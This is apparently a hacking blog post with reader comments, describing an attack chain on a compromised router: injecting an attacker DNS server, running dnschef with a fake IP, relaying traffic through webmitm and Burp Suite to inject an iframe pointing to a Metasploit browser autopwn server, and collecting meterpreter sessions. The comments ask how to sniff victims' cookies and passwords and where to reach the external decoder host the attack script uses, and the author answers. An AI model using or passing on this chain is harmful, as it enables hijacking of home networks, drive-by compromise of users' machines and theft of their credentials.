Hello again 🙂
I’m going to recap from the last post. So what I’m about to demonstrate in this post is the impact that can some attacker cause to your network once he access the router ..
We have access to the router but our goal is to get a foothold on the remote network, hmm .. we have port forwarding option which is beautiful, what we can do with that is scrap the network pool for internal IPs and forward ports like 445, 139 and try to exploit them from our end. Imagine also a network with 200 machines that will definitely be time consuming .. even if you write a script to automate that what makes you believe that you’re going to actually be able to get meterpreter sessions ?
So .. what’s the solution ?
Hmm, DNS is an interesting thing to look at since we can provide dns IP to the router for the whole network to use !!
Are we talking about DNS intercepting ? Hell yeah 😀
Here is a list of the tools we’re going to use :
Dnschef : A dns proxy ( read about it HERE )
Metasploit : How to install ( ubuntu ) HERE
Webmitm : Find out more about it HERE
Burp Suite : It’s available HERE
-Attacking from ubuntu “Metasploit & dnschef & webmitm” running on (IP: 192.168.0.6)
-Burp suite will be running at (IP:192.168.0.10)
First, I’ll explain how I’m going to do the attack :
We’re going to setup our Dnschef proxy
./dnschef.py –interface 192.168.1.106 –fakeip 192.168.1.106
–interface : is going to tell dnschef at what interface it’ll listen for .
–fakeip : this hijacks requests by returning this IP as the result for every request
The next step is to lunch webmitm tool that will handle the http requests and responses, from there we’ll tell webmitm tool to forward the traffic to burp suite proxy that will allow us to inject an iframe of Metasploit browser autopwn server.
We have to configure burp suite so that it handle requests on port 80
Have to be invisible ..
Repeat these steps for port 443 to handle HTTPS traffic .
Ok, so everything is ready now .. I’ll have to modify the scripts I provided in the previous post so that we can inject our DNS server .
This way I injected my ip address as the first DNS server to use on the router and the 2nd one is the one that belongs to google, this way if we want to stop the attack on the already injected routers by blocking requests made to our DNS server , then the router will automatically proceed to the 2nd server that belongs to google without showing any DNS resolution error on the victim end.
ok, so now we’ll have to lunch the browser autopwn module on metasploit .
PS: I’ll be using port “8080” because webmitm is already using port “80” to forward traffic .
it’s loaded and waiting for victims to browse 🙂
Ok, so from here we’ll have to add the iframe injection to burp suite. So that if it get a response on a page requested by the victim it injects iframe with “http://192.168.0.6:8080/” that’s listening on Metasploit.
DEMO :
After injecting my DNS server to the victim router using the scripts, and after setting up everything from dnschef to metasploit . Let’s follow what happens if a victim browse to a website .
We got 3 meterpreter sessions :D,
DO YOU REALIZE WHAT CAN SOMEONE DO IF HE HACKS INTO YOUR ROUTER WITH SOME VULNERABILITY OR JUST DEFAULT PASSWORDS THAT YOU DIDN’T CHANGE ?
Any questions or comments feel free to contact me. And as always : Happy Hacking 🙂
root@Nasro 
great job dude
that’s what i call automation
root
hi bro
vey nice job ….
i have question …
what can i do if want to sniff data such as cookie or password from data in router ?
tanx
i mean dont use Metasploit …. just sniffing data or fishing some website like facebook…
sorry for spam
Hi, thanks for you comments . Well, I understand what you are willing to do .. so what i recommend is just proceed with the steps i provided and then lunch your wireshark or any other packer sniffing software and then you should see data, basically all of the victim’s traffic is going through your computer 🙂 .
I hope this helps ..
tanQ i use dnschef and webmitm -d and than i run dsnif and work well now i want to change script becuse it use sabnet cdr …. and i want to use ip range :
you use IPNetwork subnet :
for ip in IPNetwork (‘0.0.0.1/24’):
and i want to use ip range
for example :
netaddr.iprange_to_cidrs (‘0.0.0.1 , 255.255.255.255’):
any idea ?
tanq brother 🙂
this site is no longer available : http://50.57.229.26/zynos.php !!
http://198.61.167.113/zynos voici 😉
123 vive l’algerie 😉
sorry coz i’m so bad in english & i wanna learn from u if u want, but in arabic
is there anyway to contact u ?
any one can give the zynos.php source code
Nasro can u make this tutorial in short video please
i got some error when i use dnschef
thx 😉
Great Tutorial …. but how will packets forwarded automatically from burpsuite proxy
Hi,
if you followed the tutorial then burpsuite should play a role of MITM ( INTERNET — BURP — VICTIM ).
Hi Bro , it’s Great Job nd Thnx For what you do 😉
i have a problem when i injected my ip to server dns route of victem , it’s not working ? i don’t understood that ! i try with all ways so can you explain to me ?!!
Hi nasro,, can i contact u via email?
Sure !
Hi Bro , ur attack misses only one thing 😉 , what if the targeted router is not accessible from outside (public network) , well the answer is here http://www.youtube.com/watch?v=r13ESXEfQVE ,
Hi,
it’s a great code by python that one for zynos attack… but i can’t get results as the str1 is empty!! or the result of the decoded.php is something like “There was an error uploading the file, please try again!”.. like when you access the page like this”
http://198.61.167.113/zynos/decoded.php
any help please?
that’s good !!
Hi Nassro
good work
while running the script im getting the following error
Traceback (most recent call last):
File “C:\Users\raydan\Desktop\zynos-attacker-master\zynos-attacker-master\attack.py”, line 1, in
from netaddr import IPNetwork
ImportError: No module named netaddr
You’ll need to install the “netaddr” module for python.
ok so i got everything set up. but where do i find ip for burpsuite? and when i do browse it comes up with burp saying something. i also tried this and set up a server via Setoolkit. and to set dnschef fakedomain=facebook.com. did not work also tried setting up sslstrip bot no joy. thanks for this anyways.
but you got a private ip if the router isnt your ?!
how to do this over wan ?!
Hi. This is the only article I have found on this. I have some questions.
Sorry if they are noob questions.
I am running kali linux.
Is this possible without running Burp on a diffrent IP?
Assuming , I have a remote router’s login, what IP would I put in the router’s Static DNS to point all client requests to my NOIP for se toolkit attacks?
If that is not possible what IP can I put in there just to monitor traffic?
Noobest question ..How do I make my NoIP address a DNS server?
Thanks.